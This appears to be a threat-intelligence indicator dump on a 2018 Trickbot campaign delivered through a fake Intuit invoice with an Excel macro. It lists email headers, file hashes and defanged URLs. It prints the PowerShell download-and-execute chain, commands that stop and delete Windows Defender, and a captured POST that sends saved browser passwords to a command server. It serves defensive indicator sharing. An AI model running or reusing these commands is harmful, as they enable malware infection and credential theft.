VRad

#trickbot_240918

Sep 24th, 2018
#IOC #OptiData #VR #Trickbot #X97M #macro

https://myonlinesecurity.co.uk/trickbot-delivered-via-fake-intuit-fw-invoice-3989021-email/

email_headers
--------------
Received: from intuit-invoice.co.uk (hosted-by.leaseweb.com [5.79.78.24] (may be forged))
by mailsrv1.victim.com (8.15.2/8.15.2) with ESMTP id w8OBMBKB095862
for <user1@mev.victim.com>; Mon, 24 Sep 2018 14:22:11 +0300 (EEST)
(envelope-from J.Monta-user1=mev.victim.com@intuit-invoice.co.uk)
Received: by intuit-invoice.co.uk id hl34cda5qi05 for <user1@mev.victim.com>;
Mon, 24 Sep 2018 07:07:32 -0400 (envelope-from <J.Monta-user1=mev.victim.com@intuit-invoice.co.uk>)
Subject: FW: Invoice #3989021
From: "Intuit Invoice" <J.Monta@intuit-invoice.co.uk>

files
--------------

SHA-256 b24f811c6f7a930e78d3769c39f95d899b089ac4b805f3654b37922b41c6a233
File name Invoice3989021.xls
File size 56.5 KB

SHA-256 f1fca2ff7712a60158068b151b5ebf0c73826b50cb8be136fc17ba8c7c2d0107
File name Client dll for Pim Index Maintenance
File size 361 KB

h11p: \eaucardinal{.} com/perfo.rmance
h11p: \abogadodetexas{.} com/perfo.rmance

activity
-------------

proc
--------------
"C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" /e
cmd /c powershell "'powershell ""function iter([string] $totalfilesize){(new-object system.net.webclient).downloadfile($totalfilesize,''%tmp%\very.exe'');start-process ''%tmp%\very.exe'';}try{iter(''http://eaucardinal{.} com/perfo.rmance'')}catch{iter(''http://abogadodetexas{.} com/perfo.rmance'')}'"" | out-file -encoding ascii -filepath %tmp%\parser.bat; start-process '%tmp%\parser.bat' -windowstyle hidden"
powershell "'powershell ""function iter([string] $totalfilesize){(new-object system.net.webclient).downloadfile($totalfilesize,''C:\tmp\very.exe'');start-process ''C:\tmp\very.exe'';}try{iter(''http://eaucardinal{.} com/perfo.rmance'')}catch{iter(''http://abogadodetexas{.} com/perfo.rmance'')}'"" | out-file -encoding ascii -filepath C:\tmp\parser.bat; start-process 'C:\tmp\parser.bat' -windowstyle hidden"
cmd /c ""C:\tmp\parser.bat" "
powershell "function iter([string] $totalfilesize){(new-object system.net.webclient).downloadfile($totalfilesize,'C:\tmp\very.exe');start-process 'C:\tmp\very.exe';}try{iter('http://eaucardinal{.} com/perfo.rmance')}catch{iter('http://abogadodetexas{.} com/perfo.rmance')}
"C:\tmp\very.exe"
C:\Windows\SysWOW64\cmd.exe
sc stop WinDefend
sc delete WinDefend
/c powershell Set-MpPreference -DisableRealtimeMonitoring $true
powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Users\operator\AppData\Roaming\AIMT\vesy.exe
C:\Windows\SysWOW64\cmd.exe
sc stop WinDefend
sc delete WinDefend
/c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\system32\svchost.exe
svchost.exe
svchost.exe
:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\taskeng.exe {6A47CA07-7739-4626-8919-0200D91B9F0B} S-1-5-21-136527031-2493574210-1221074019-1000:APM11\operator:Interactive:[1]
C:\Users\operator\AppData\Roaming\AIMT\vesy.exe
C:\Windows\SysWOW64\cmd.exe
/c sc stop WinDefend
sc delete WinDefend
C:\Windows\SysWOW64\cmd.exe
/c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\system32\svchost.exe

persist
--------------
\Msntcs Client dll for Pim Index Maintenance
Client dll for Pim Index Maintenance
c:\users\operator\appdata\roaming\aimt\vesy.exe 24.09.2018 11:16

netwrk
--------------
198.50.100.170 eaucardinal{.} com GET /perfo.rmance HTTP/1.1 301
198.50.100.170 www.eaucardinal{.} com GET /perfo.rmance HTTP/1.1 404
23.229.233.135 abogadodetexas{.} com GET /perfo.rmance HTTP/1.1 200 !This program cannot be run in DOS mode.

52.1.46.34 checkip.amazonaws.com GET / HTTP/1.1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) 200 Public IP

138.34.45.133 138.34.45.133 POST /ser0924/APM11_W617601.id/81/ HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64;
138.34.45.133 138.34.45.133 POST /ser0924/APM11_W617601.id/81/ HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64;

POST /ser0924/APM11_W617601.id/81/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0
Host: 138.34.45.133

-----------NZYIBXEQQVBQBMZW
Content-Disposition: form-data; name="data"

http://www.i.ua|oper|********(saved passwd)
https://www.ukr.net|11oper|********(saved passwd)
https://accounts.google.com|oper11.wdma@gmail.com|********(saved passwd)
https://login.live.com|oper11.wdma@gmail.com|********(saved passwd)

-----------NZYIBXEQQVBQBMZW
Content-Disposition: form-data; name="source"

firefox passwords
-----------NZYIBXEQ

powershell.exe 2336 TCP 10.0.2.15 49693 198.50.100.170 80 ESTABLISHED
powershell.exe 2336 TCP 10.0.2.15 49694 198.50.100.170 80 ESTABLISHED
powershell.exe 2336 TCP 10.0.2.15 49695 23.229.233.135 80 ESTABLISHED


svchost.exe 2540 TCP 10.0.2.15 49696 216.239.32.21 80 ESTABLISHED
svchost.exe 2540 TCP 10.0.2.15 49697 216.239.32.21 443 ESTABLISHED
svchost.exe 2540 TCP 10.0.2.15 49698 107.181.174.176 443 SYN_SENT


svchost.exe 2540 TCP apm11 49696 any-in-2015.1e100.net http ESTABLISHED
svchost.exe 2540 TCP apm11 49697 any-in-2015.1e100.net https ESTABLISHED
svchost.exe 2540 TCP apm11 49699 vds5605.example.com https SYN_SENT

# # #
https://www.virustotal.com/#/file/b24f811c6f7a930e78d3769c39f95d899b089ac4b805f3654b37922b41c6a233/community
https://www.virustotal.com/#/file/f1fca2ff7712a60158068b151b5ebf0c73826b50cb8be136fc17ba8c7c2d0107/community
https://analyze.intezer.com/#/analyses/7b1c2c08-1538-4aa1-a0b4-c4a66c7dbcc9